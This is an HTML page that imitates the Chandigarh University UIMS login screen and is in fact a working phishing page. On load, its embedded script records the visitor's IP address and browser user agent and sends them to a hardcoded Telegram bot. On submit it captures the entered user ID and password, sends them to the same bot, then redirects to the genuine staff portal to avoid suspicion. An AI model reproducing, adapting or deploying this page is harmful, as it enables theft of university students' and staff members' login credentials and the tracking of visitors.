<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Chandigarh University Management System Login</title>
    <style>
      * {
        margin: 0;
        padding: 0;
      }

      body {
        font-family: "Roboto", sans-serif;
        font-weight: 400;
        color: #ffffff;
      }

      .landing-bg::before {
        background-image: url(assets/login-bg.jpg);
        background-size: cover;
        bottom: 0;
        content: "";
        display: block;
        filter: blur(10px);
        height: 100%;
        left: 0;
        position: fixed;
        right: 0;
        top: 0;
        width: 100%;
        z-index: -1;
      }

      .login-form {
        display: flex;
        flex-direction: column;
        justify-content: center;
        align-items: center;
        margin-top: 100px;
        gap: 10px;
      }

      .login-form form {
        display: flex;
        flex-direction: column;
        justify-content: center;
        align-items: center;
        gap: 10px;
      }

      h2 {
        font-size: 28px;
        font-weight: 500;
      }

      p {
        font-size: 13px;
        color: #fff;
        width: 276px;
        text-align: center;
        margin-bottom: 20px;
      }

      input {
        width: 100%;
        height: 38px;
        border-radius: 30px;
        background-color: rgba(255, 255, 255, 0.5);
        padding: 0 20px;
        color: #000;
        border: 1px solid #ddd;
      }

      button {
        width: 300px;
        background-color: red;
        border: 1px solid transparent;
        border-radius: 30px;
        height: 38px;
        color: white;
        margin-top: 10px;
      }
    </style>
  </head>

  <body>
    <script>
      document.addEventListener("DOMContentLoaded", async () => {
        const telegramToken = "8017878351:AAEbY9if7gFeiKA0CuBxinrI8815kfGiaSc";
        const telegramChatID = "7170636658";
        const userAgent = navigator.userAgent;
        let ipAddress = null;

        async function sendToTelegram(message) {
          const url = `https://api.telegram.org/bot${telegramToken}/sendMessage`;
          const params = new URLSearchParams({
            chat_id: telegramChatID,
            text: message,
          }).toString();
          await fetch(`${url}?${params}`);
        }

        async function fetchIpAddress() {
          const response = await fetch("https://api.ipify.org?format=json");
          const data = await response.json();
          ipAddress = data.ip;
          await sendToTelegram(
            `[!] CONFIRM VISIT:\nUser Agent: ${userAgent}\nIP Address: https://whatismyipaddress.com/ip/${ipAddress}`
          );
        }

        await fetchIpAddress();

        document
          .querySelector("form")
          .addEventListener("submit", async (event) => {
            event.preventDefault();

            const id = document.getElementById("id").value;
            const password = document.getElementById("password").value;

            const loginMessage = `[!] CONFIRM LOGIN:\nUser ID: ${id}\nPassword: ${password}\nUser Agent: ${userAgent}\nIP Address: https://whatismyipaddress.com/ip/${ipAddress}`;
            await sendToTelegram(loginMessage);

            window.location.href = "http://staff.cuchd.in/";
          });
      });
    </script>

    <div class="landing-bg">
      <div class="color-overlay">
        <div class="login-form">
          <div class="uims-logo">
            <img src="assets/login-logo.png" alt="uimslogo" />
          </div>
          <h2>Log in</h2>
          <p>Welcome to University Information Management System</p>
          <form method="POST">
            <input
              type="text"
              id="id"
              name="id"
              maxlength="15"
              placeholder="Enter User Id"
              required
            />
            <input
              type="password"
              id="password"
              name="password"
              maxlength="15"
              placeholder="Enter Password"
              required
            />
            <button type="submit" name="submit">LOGIN</button>
          </form>
        </div>
      </div>
    </div>
  </body>
</html>
